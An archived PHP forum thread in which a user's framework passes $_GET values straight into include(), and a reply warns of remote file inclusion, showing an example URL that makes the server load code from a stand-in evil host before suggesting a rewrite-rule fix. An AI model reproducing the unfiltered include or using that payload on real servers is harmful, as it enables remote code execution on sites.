TalkPHP

TalkPHP (http://www.talkphp.com/forums.php)
-   General (http://www.talkphp.com/general/)
-   -   Help with GET (http://www.talkphp.com/general/5643-help-get.html)

jwilson122 11-26-2010 01:08 AM
Help with GET
 
Okay so I'm creating my own framework script, the URL's are gonna be:
controller.php?folder=foldernamehere&page=pagename here

So in the controller.php I have..
PHP Code:
$folder $_GET['folder'];
$page $_GET['page'];
include('plugins/'.$folder.'/'.$page.'.php'); 
Then in .htaccess I will do:
Rewrite On
RewriteRule ^(.*)/(.*)\.php$ controller.php?folder=$1&page=$2

Well, works out fine if I access say.. /users/index.php it will display the info perfect! But, on to my issue.
Well, say on that /users/index.php file, I want to get something from the URL... say, /users/index.php?user=bla
Well, it will not work for some reason! Any idea why? I believe its because I already have used it in the .htaccess file, but not sure.. How can I fix it? Thanks a lot!

sketchMedia 11-26-2010 03:31 PM
Two things, first of all the obvious security issues with that script. NEVER just allow user input to be used in scripts without first filtering them. With your example one could enter this into the URL param and be able to execute dangerous code from an external source on your server as if it came from your server, for example:

PHP Code:
include "{$_GET['folder']}/include.php"
If i then do this:
Code:
http://yourserver.com/script.php?folder=http://evilscriptslol.com/evil.inc?
In the PHP this would mean:

PHP Code:
include "http://evilscriptslol.com/evil.inc?/include.php"
Causing no end of problems (assuming allow_url_fopen) is enabled (as it is by default I believe)A simple switch would help mitigate the threat somewhat.

Filter Input Escape Output - Golden rule of web-development (and most other types of development)

Secondly to your actual problem, try adding [QSA] to the end of your rewrite rule:
Code:
Rewrite On
RewriteRule ^(.*)/(.*)\.php$ controller.php?folder=$1&page=$2 [QSA]
It should then pass any additional url parameters through.

jwilson122 11-27-2010 12:36 AM
Quote:
Originally Posted by sketchMedia (Post 31265)
Two things, first of all the obvious security issues with that script. NEVER just allow user input to be used in scripts without first filtering them. With your example one could enter this into the URL param and be able to execute dangerous code from an external source on your server as if it came from your server, for example:

PHP Code:
include "{$_GET['folder']}/include.php"
If i then do this:
Code:
http://yourserver.com/script.php?folder=http://evilscriptslol.com/evil.inc?
In the PHP this would mean:

PHP Code:
include "http://evilscriptslol.com/evil.inc?/include.php"
Causing no end of problems (assuming allow_url_fopen) is enabled (as it is by default I believe)A simple switch would help mitigate the threat somewhat.

Filter Input Escape Output - Golden rule of web-development (and most other types of development)

Secondly to your actual problem, try adding [QSA] to the end of your rewrite rule:
Code:
Rewrite On
RewriteRule ^(.*)/(.*)\.php$ controller.php?folder=$1&page=$2 [QSA]
It should then pass any additional url parameters through.
Thanks a lot! It says internal server error with your code :/

Quote:
Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, you@example.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

sketchMedia 11-29-2010 10:24 AM
Should work, can I see your full htaccess.


All times are GMT. The time now is 08:21 AM.

Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2013, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.1.0